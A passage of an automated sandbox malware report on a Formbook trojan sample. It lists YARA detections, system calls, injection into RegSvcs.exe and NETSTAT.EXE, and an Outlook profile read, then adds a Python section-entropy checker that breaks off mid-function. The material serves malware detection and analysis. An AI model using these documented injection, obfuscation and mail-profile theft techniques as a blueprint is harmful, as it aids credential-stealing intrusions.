      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: String function: 012FB150 appears 136 times
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: String function: 0359B150 appears 87 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013399A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013398F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013395D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013397A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013396E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339950 NtQueueApcThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013399D0 NtCreateProcessEx,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339820 NtEnumerateKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0133B040 NtSuspendThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013398A0 NtWriteVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339B00 NtSetValueKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0133A3B0 NtGetContextThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339A10 NtQuerySection,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339A80 NtOpenDirectoryObject,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0133AD30 NtSetContextThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339520 NtWaitForSingleObject,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339560 NtWriteFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013395F0 NtQueryInformationFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339730 NtQueryVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0133A710 NtOpenProcessToken,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0133A770 NtOpenThread,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339770 NtSetInformationFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339760 NtOpenProcess,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339610 NtEnumerateValueKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339670 NtQueryInformationProcess,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_01339650 NtQueryValueKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_013396D0 NtCreateKey,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0041E087 NtAllocateVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_004012A4 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0041DEA7 NtCreateFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0041DF57 NtReadFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0041DFD7 NtClose,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0041E083 NtAllocateVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_004014E9 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0041DEA1 NtCreateFile,
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Code function: 1_2_0041DFD1 NtClose,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9610 NtEnumerateValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9560 NtWriteFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D95D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035DA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035DB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035DA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035DA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035DAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_035D95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC8A0 NtClose,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC820 NtReadFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC870 NtDeleteFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC950 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC770 NtCreateFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC89A NtClose,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC8CA NtDeleteFile,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC94C NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 10_2_00BDC76A NtCreateFile,
      Source: NHYGUnNN.exe, Static PE information: No import functions for PE file found
      Source: NHYGUnNN.exe, 00000000.00000002.237146160.0000012A25D66000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.237199303.0000012A25EE0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, Binary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
      Source: NHYGUnNN.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: NHYGUnNN.exe, ReversingLabs: Detection: 27%
      Source: C:\Users\user\Desktop\NHYGUnNN.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown, Process created: C:\Users\user\Desktop\NHYGUnNN.exe C:\Users\user\Desktop\NHYGUnNN.exe
      Source: C:\Users\user\Desktop\NHYGUnNN.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
      Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
      Source: C:\Users\user\Desktop\NHYGUnNN.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NHYGUnNN.exe.log
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, File created: C:\Users\user\AppData\Local\Temp\1--Lt08NN
      Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@4/2@6/6
      Source: NHYGUnNN.exe, Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
      Source: C:\Users\user\Desktop\NHYGUnNN.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\NETSTAT.EXE, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
      Source: NHYGUnNN.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: NHYGUnNN.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: NHYGUnNN.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
      Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
      Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp

      Data Obfuscation

      Source: NHYGUnNN.exe, A/cb0864eb24eeeb94488d89ba2673ea289.cs.Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 0.2.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs.Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs | .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Code function: 0_2_0000012A25D250CF push rdx; ret
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Code function: 0_2_00007FFCA43F417B push edx; ret
Source: C:\Users\user\Desktop\NHYGUnNN.exe | Code function: 0_2_00007FFCA43F4185 push edx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0134D0D1 push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_004210E9 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_004210F2 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0042109C push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00421153 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041E901 push ebp; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00405A1E push ecx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_004172D0 push edx; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040A2E4 push ecx; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00409B74 push ecx; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00408BAF push cx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00409CB7 push cs; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041A528 push ebp; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_004085F9 pushfd ; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040CF66 push cs; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041AFA7 push ecx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_035ED0D1 push ecx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BCB82F push cs; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BD9870 push ecx; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BDF9BB push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BDF9B2 push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BDD1CA push ebp; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BDF965 push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BC423B push ds; iretd
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BDFA1C push eax; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BC4212 push ds; iretd
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BC4254 push 793A76E7h; ret
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 10_2_00BD5B99 push edx; retf
Source: initial sample | Static PE information: section name: .text entropy: 7.879743437690199
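The `.text entropy: 7.88` row is the packed-code check: Shannon entropy of a section's raw bytes, where ordinary compiled x86 code sits around 6 bits per byte and compressed or encrypted data approaches the 8-bit ceiling, so a 7.88 `.text` section almost certainly holds a payload that is decrypted at run time rather than native code. The Python below is an added example written for this page, not tooling from the Joe Sandbox report and not code from the sample: it parses the PE section table with the standard library only (no `pefile`), scores each section, and flags anything at or above a 7.0 cut-off, a common heuristic threshold that is itself an assumption here. It runs on a constructed PE32 skeleton (random-filled `.text`, zero-filled `.data`, empty optional header), not on NHYGUnNN.exe.

```python
import math
import random
import struct
from collections import Counter
from typing import Dict, List


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant input, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def section_entropies(pe: bytes) -> Dict[str, float]:
    """Walk the PE section table by hand and score each section's on-disk bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + size_opt          # section table follows the optional header
    out: Dict[str, float] = {}
    for k in range(nsec):
        # IMAGE_SECTION_HEADER (40 bytes): Name, VirtualSize, VirtualAddress,
        # SizeOfRawData, PointerToRawData, relocs/linenumbers, Characteristics
        name, _, _, raw_size, raw_ptr, _, _, _, _, _ = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * k)
        label = name.rstrip(b"\0").decode("ascii", "replace")
        out[label] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
    return out


def flag_packed(entropies: Dict[str, float], threshold: float = 7.0) -> List[str]:
    """Names of sections at or above the threshold (7.0 is an assumed cut-off)."""
    return sorted(name for name, e in entropies.items() if e >= threshold)


def build_test_pe() -> bytes:
    """Constructed PE32 skeleton for exercising the parser: DOS header, NT headers
    with an empty optional header (so not loadable), and two raw sections."""
    rng = random.Random(756156)                      # deterministic 'packed' bytes
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    plain = b"\0" * 4096
    e_lfanew, raw0 = 0x40, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
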